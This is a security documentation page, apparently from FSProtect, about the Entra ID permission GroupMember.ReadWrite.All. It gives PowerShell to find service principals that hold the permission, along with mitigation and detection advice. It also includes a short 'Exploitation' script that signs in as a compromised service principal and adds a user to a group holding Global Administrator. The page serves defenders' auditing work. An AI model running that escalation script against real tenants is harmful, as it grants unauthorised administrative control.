AZ_MG_GROUPMEMBER_READWRITE_ALL

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

GroupMember.ReadWrite.All

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: GroupMember.ReadWrite.All

Description

AZ_MG_GROUPMEMBER_READWRITE_ALL represents a Microsoft Graph application permission that grants read and write access to group memberships in Microsoft Entra ID (Azure AD). This permission allows:

Read all group memberships for any group in the directory
Add members to groups including security groups and Microsoft 365 groups
Remove members from groups for any group in the directory
Read group properties such as display name, description, and membership type

This permission is often abused for:

Privilege escalation: Adding attacker-controlled accounts to privileged groups (e.g., groups with Azure RBAC roles or role-assignable groups with directory roles)
Lateral movement: Adding accounts to groups that have access to Azure resources, applications, or SharePoint sites
Defense evasion: Removing security team members from monitoring groups

Important: This is an application permission that requires admin consent and is granted to service principals (applications), not individual users. Once granted, the service principal can perform these actions without additional user context.

Key Difference from Group.ReadWrite.All: Unlike Group.ReadWrite.All, this permission does not allow creating, updating, or deleting groups. It only manages memberships within existing groups.

Limitation: While this permission allows adding members to role-assignable groups, it does not allow assigning directory roles directly. However, if a role-assignable group already has a directory role assigned, adding members to that group effectively grants those members the role.

Identification

PowerShell

Find Service Principals with GroupMember.ReadWrite.All

Step: Retrieve all service principals with their app role assignments

This step fetches all service principals across the tenant, expanding their appRoleAssignments.

Step: Filter for GroupMember.ReadWrite.All

After retrieving all service principals, filter for app role assignments matching the GUID for GroupMember.ReadWrite.All and export results.

Find-ServicePrincipals-GroupMemberReadWriteAll.ps1

Connect-AzAccount

$permissionId = "dbaae8cf-10b5-4b86-a4a1-f871c94c6695"  # GroupMember.ReadWrite.All GUID

# Step 1: Get all app role assignments across the tenant
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

# Step 2: Filter for those with GroupMember.ReadWrite.All
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "GroupMember.ReadWrite.All"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with GroupMember.ReadWrite.All"
$results | Export-Csv -Path ".\GroupMemberReadWriteAll_ServicePrincipals.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

An attacker with access to a service principal that has GroupMember.ReadWrite.All can perform privilege escalation by manipulating group memberships.

Add User to a Privileged Group

Exploit-AddUserToGroup.ps1

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Target a role-assignable group that has Global Administrator role assigned
$group = Get-AzADGroup -DisplayName "<target-group-name>"
$user = Get-AzADUser -UserPrincipalName "<target-user-upn>"

# Add user to the group
$uri = "https://graph.microsoft.com/v1.0/groups/$($group.Id)/members/`$ref"
$body = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$($user.Id)"
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Added user to group. Status: $($response.StatusCode)"

Mitigation

Audit all service principals with GroupMember.ReadWrite.All and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select the application -> API permissions.
- Remove the GroupMember.ReadWrite.All permission if not required.
Apply least privilege: Replace with more specific permissions where possible:
- Use GroupMember.Read.All if only read access is needed.
- Use delegated permissions with user context when appropriate.
Protect role-assignable groups:
- Limit the number of role-assignable groups in your tenant.
- Enable Privileged Identity Management (PIM) for role-assignable groups.
- Require approval for adding members to role-assignable groups.
Implement Access Reviews for applications with high-privilege permissions:
- Go to Identity Governance -> Access Reviews -> New access review.
- Review applications with sensitive Graph permissions regularly.
Use Conditional Access to restrict service principal access:
- Limit the locations and conditions under which service principals can authenticate.

Detection

Detect permission grants and suspicious activity in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add app role assignment to service principal
- Add member to group
- Remove member from group

Monitor for suspicious patterns:

Membership changes to role-assignable groups by service principals.
Bulk group membership modifications.
Membership changes to groups with Azure RBAC permissions.
Removal of members from security or monitoring groups.
Group membership modifications outside of change management windows.

References

https://learn.microsoft.com/en-us/graph/permissions-reference#groupmemberreadwriteall
https://learn.microsoft.com/en-us/graph/api/resources/group
https://learn.microsoft.com/en-us/graph/api/group-post-members
https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/groups-concept
https://learn.microsoft.com/en-us/entra/workload-id/workload-identities-overview
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
https://github.com/dirkjanm/ROADtools

PreviousAZ_MG_GROUP_READWRITE_ALL NextAZ_MG_ROLEMANAGEMENT_READWRITE_DIRECTORY

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with GroupMember.ReadWrite.All

hashtagStep: Retrieve all service principals with their app role assignments

hashtagStep: Filter for GroupMember.ReadWrite.All

hashtagExploitation

hashtagAdd User to a Privileged Group

hashtagMitigation

hashtagDetection

hashtagReferences

Summary

Description

Identification

PowerShell

Find Service Principals with GroupMember.ReadWrite.All

Step: Retrieve all service principals with their app role assignments

Step: Filter for GroupMember.ReadWrite.All

Exploitation

Add User to a Privileged Group

Mitigation

Detection

References